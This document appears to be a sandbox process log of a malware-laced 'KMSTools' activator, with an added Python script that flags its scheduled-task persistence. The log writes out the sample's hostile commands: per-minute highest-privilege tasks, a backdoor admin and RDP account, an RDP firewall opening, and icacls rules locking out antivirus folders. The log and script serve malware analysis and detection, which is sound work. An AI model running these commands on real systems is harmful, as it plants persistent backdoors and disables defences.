"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=6416,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=6164 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4836,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=2572 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3280,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=3560 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5004,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5392 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5384,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=3988 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6816,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=2892 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5828,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5456 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3568,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5468 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3416,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5324 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5468,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=6160 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\17f790d5-9468-40ac-8b9a-1b672e685976_KMSTools.zip.976\KMS Tools Lite Portable\KMSTools Lite.exe

"C:\Users\Admin\AppData\Local\Temp\17f790d5-9468-40ac-8b9a-1b672e685976_KMSTools.zip.976\KMS Tools Lite Portable\KMSTools Lite.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5560,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=3288 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\1baee621-d038-4d45-a4c5-391449c8479b_KMSTools.zip.79b\KMS Tools Lite Portable\KMSTools Lite.exe

"C:\Users\Admin\AppData\Local\Temp\1baee621-d038-4d45-a4c5-391449c8479b_KMSTools.zip.79b\KMS Tools Lite Portable\KMSTools Lite.exe"

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\PerfLogs\KMSTools.zip"

C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe

"C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6840,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5424 /prefetch:8

C:\KMS Tools Lite Portable\KMSTools Lite.exe

"C:\KMS Tools Lite Portable\KMSTools Lite.exe"

C:\KMS Tools Lite Portable\GSetup.exe

"C:\KMS Tools Lite Portable\GSetup.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\Sysnative\cmd.exe" /c copy C:\Windows\system32\Tasks\KMSTools "C:\Users\Admin\AppData\Local\Temp\KMSTools.tmp" /Y

C:\ProgramData\Setup\install.exe

C:\ProgramData\Setup\install.exe -palexpassword

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x510 0x514

C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe

"C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe" x data.pak -pratiboruskmstoolsmsfree.su -y -bsp1 -aos -o"C:\KMS Tools Lite Portable\Programs" "W10 Digital Activation Program"*

C:\KMS Tools Lite Portable\Programs\W10 Digital Activation Program\W10DigitalActivation.exe

"C:\KMS Tools Lite Portable\Programs\W10 Digital Activation Program\W10DigitalActivation.exe"

C:\ProgramData\Setup\KMS.exe

"C:\ProgramData\Setup\KMS.exe"

C:\ProgramData\Setup\update.exe

"C:\ProgramData\Setup\update.exe"

C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe

"C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe" x data.pak -pratiboruskmstoolsmsfree.su -y -bsp1 -aos -o"C:\KMS Tools Lite Portable\Programs" "Office Installer+"*

C:\KMS Tools Lite Portable\Programs\Office Installer+\Office Installer+_x64.exe

"C:\KMS Tools Lite Portable\Programs\Office Installer+\Office Installer+_x64.exe"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\SystemManager" /TR "C:\Programdata\ReaItekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\ManagerService" /TR "C:\Programdata\ReaItekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\GlobalData" /TR "C:\Windows\SysWOW64\unsecapp.exe" /SC MINUTE /MO 1 /RL HIGHEST

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\WinlogonCheck" /TR "C:\Programdata\ReaItekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\KMS Tools Lite Portable\Programs\Office Installer+\readme.txt

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\OnlogonCheck" /TR "C:\Programdata\ReaItekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST
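The five schtasks.exe invocations above are the sample's persistence mechanism: tasks created under the built-in Microsoft\Windows\WindowsBackup folder, run at HIGHEST level every one or two minutes or at each logon, pointing at binaries in C:\Programdata\ReaItekHD (a capital I where the vendor name Realtek has an l) and at C:\Windows\SysWOW64\unsecapp.exe, a system binary name outside its usual wbem directory. The Python below is an added example, not part of this report or of any tool named in it: it parses those command lines, copied verbatim as constructed sample input, and flags the traits a triage analyst would check for. The vendor-name allowlist and the expected home directories of taskhost.exe, taskhostw.exe and unsecapp.exe are assumptions for illustration.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample input: the five schtasks.exe command lines from this
# report's process list, copied verbatim.
SCHTASKS_CMDLINES = [
    r'"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\SystemManager" /TR "C:\Programdata\ReaItekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST',
    r'"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\ManagerService" /TR "C:\Programdata\ReaItekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST',
    r'"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\GlobalData" /TR "C:\Windows\SysWOW64\unsecapp.exe" /SC MINUTE /MO 1 /RL HIGHEST',
    r'"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\WinlogonCheck" /TR "C:\Programdata\ReaItekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST',
    r'"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\OnlogonCheck" /TR "C:\Programdata\ReaItekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST',
]

_TOKEN = re.compile(r'"([^"]*)"|(\S+)')
VALUE_SWITCHES = {"/TN", "/TR", "/SC", "/MO", "/RL", "/ST", "/RU", "/RP", "/XML"}

# Assumptions for illustration: a tiny allowlist of vendor directory names,
# confusable characters folded before comparing against it, the directories in
# which these Windows binaries normally live, and the roots a task created under
# Microsoft\Windows\ is expected to execute from.
KNOWN_VENDOR_DIRS = {"realtekhd", "realtek"}
CONFUSABLE = str.maketrans({"I": "l", "1": "l", "|": "l", "0": "o"})
EXPECTED_PARENT = {
    "taskhost.exe": ("system32", "syswow64"),
    "taskhostw.exe": ("system32", "syswow64"),
    "unsecapp.exe": ("wbem",),
}
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files")


def tokenize(cmdline: str) -> list[str]:
    """Split a Windows command line on whitespace, honouring double quotes (backslashes are literal)."""
    return [q or w for q, w in _TOKEN.findall(cmdline)]


def parse_schtasks(cmdline: str) -> dict[str, str]:
    """Return the value-taking switches of a schtasks command line, keyed by upper-cased switch."""
    toks = tokenize(cmdline)
    opts: dict[str, str] = {}
    i = 0
    while i < len(toks):
        sw = toks[i].upper()
        if sw in VALUE_SWITCHES and i + 1 < len(toks):
            opts[sw] = toks[i + 1]
            i += 2
        else:
            i += 1
    return opts


def lookalike_segment(path: str):
    """Return (segment, folded) when a directory name matches a known vendor only after confusable folding."""
    for seg in path.split("\\")[:-1]:
        folded = seg.translate(CONFUSABLE).lower()
        if folded in KNOWN_VENDOR_DIRS and seg.lower() != folded:
            return seg, folded
    return None


@dataclass
class Finding:
    task: str
    action: str
    reasons: list[str]


def triage(cmdline: str):
    """Score one schtasks /create command line; None if it creates no task."""
    opts = parse_schtasks(cmdline)
    if "/TN" not in opts or "/TR" not in opts:
        return None
    task, action = opts["/TN"], opts["/TR"]
    exe = tokenize(action)[0] if action.strip() else ""
    parts = exe.lower().split("\\")
    basename, parent = parts[-1], (parts[-2] if len(parts) > 1 else "")
    reasons: list[str] = []
    # Task folder imitates a built-in Windows folder but the action lives elsewhere.
    if task.lower().startswith("microsoft\\windows\\") and not exe.lower().startswith(TRUSTED_ROOTS):
        reasons.append("built-in task folder but action outside Windows/Program Files")
    hit = lookalike_segment(exe)
    if hit:
        reasons.append(f"lookalike directory {hit[0]!r} (reads as {hit[1]!r})")
    # A well-known system binary name in a directory it does not normally occupy.
    if basename in EXPECTED_PARENT and parent not in EXPECTED_PARENT[basename]:
        reasons.append(f"system binary name {basename!r} outside its usual directory")
    rl, sc, mo = opts.get("/RL", "").upper(), opts.get("/SC", "").upper(), opts.get("/MO", "")
    if rl == "HIGHEST" and sc == "MINUTE" and mo.isdigit() and int(mo) <= 5:
        reasons.append(f"highest run level re-launched every {mo} minute(s) (watchdog)")
    elif rl == "HIGHEST" and sc == "ONLOGON":
        reasons.append("highest run level at every logon")
    return Finding(task, exe, reasons)


def triage_all(cmdlines) -> list[Finding]:
    return [f for f in map(triage, cmdlines) if f is not None and f.reasons]


if __name__ == "__main__":
    for f in triage_all(SCHTASKS_CMDLINES):
        print(f.task, "->", f.action)
        for r in f.reasons:
            print("   ", r)
```

The same checks apply to live hosts: feed it the Actions and Triggers of Get-ScheduledTask output, or the command lines from process-creation telemetry, and the per-minute HIGHEST watchdog pair plus the confusable vendor directory separate this from legitimate vendor tasks.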

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --always-read-main-dll --field-trial-handle=3376,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5460 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --always-read-main-dll --field-trial-handle=5368,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5584 /prefetch:1

C:\ProgramData\Microsoft\win.exe

C:\ProgramData\Microsoft\win.exe -ppidar

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x264,0x268,0x26c,0x260,0x28c,0x7ff847c7f208,0x7ff847c7f214,0x7ff847c7f220

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1852,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=2644 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2608,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=2616 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2296,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=3224 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4228,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4244 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4376,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4384 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4696,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4756 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4332,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4776 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --always-read-main-dll --field-trial-handle=4728,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4176 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5332,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=5316 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5332,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=5316 /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc start appidsvc

C:\Windows\system32\sc.exe

sc start appidsvc

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\WindowsTask\winlogon.bat

C:\Windows\system32\sc.exe

sc config appidsvc start= auto

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\WindowsTask\new.xml"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\SysFilesQ\RecoveryHosts" /TR "C:\ProgramData\Microsoft\DRM\Vb0NjPwXy\SysFilesQ.bat" /SC ONLOGON /RL HIGHEST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe " /c " & "icacls "C:\KVRT_Data" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls C:\KVRT_Data /deny system:(OI)(CI)(F)

C:\ProgramData\Setup\svchost.exe

C:\ProgramData\Setup\svchost.exe -ppidar

C:\ProgramData\Setup\IP.exe

"C:\ProgramData\Setup\IP.exe"

C:\ProgramData\Setup\smss.exe

"C:\ProgramData\Setup\smss.exe"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winsers" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC MINUTE /MO 1 /RL HIGHEST

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winser" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC ONLOGON /RL HIGHEST

C:\ProgramData\Windows Tasks Service\winserv.exe

"C:\ProgramData\Windows Tasks Service\winserv.exe"

C:\ProgramData\Windows Tasks Service\winserv.exe

"C:\ProgramData\Windows Tasks Service\winserv.exe" -second

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net user John 12345 /add

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net localgroup "Администраторы" John /add

C:\Windows\system32\net.exe

net user John 12345 /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user John 12345 /add

C:\Windows\system32\net.exe

net localgroup "Администраторы" John /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup "Администраторы" John /add

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного рабочего стола" John /add

C:\Windows\system32\net.exe

net localgroup "Пользователи удаленного рабочего стола" John /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного управления" john /add" John /add

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe

C:\Windows\system32\net.exe

net localgroup "Пользователи удаленного управления" john /add" John /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" john /add" John /add

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net localgroup "Administrators" John /add

C:\Windows\system32\net.exe

net localgroup "Administrators" John /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup "Administrators" John /add

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net localgroup "Administradores" John /add

C:\Windows\system32\net.exe

net localgroup "Administradores" John /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup "Administradores" John /add

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net localgroup "Remote Desktop Users" john /add

C:\Windows\system32\net.exe

net localgroup "Remote Desktop Users" john /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup "Remote Desktop Users" john /add

C:\Windows\SysWOW64\unsecapp.exe

C:\Windows\SysWOW64\unsecapp.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Programdata\Microsoft\temp\H.bat

C:\ProgramData\RDPWinst.exe

C:\ProgramData\RDPWinst.exe -i

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -s TermService

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5704,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=5800 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5748,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=5740 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5776,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4148 /prefetch:8

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -s TermService

C:\Windows\SYSTEM32\netsh.exe

netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files (x86)\Microsoft JDX" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Windows\Fonts\Mysql" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)

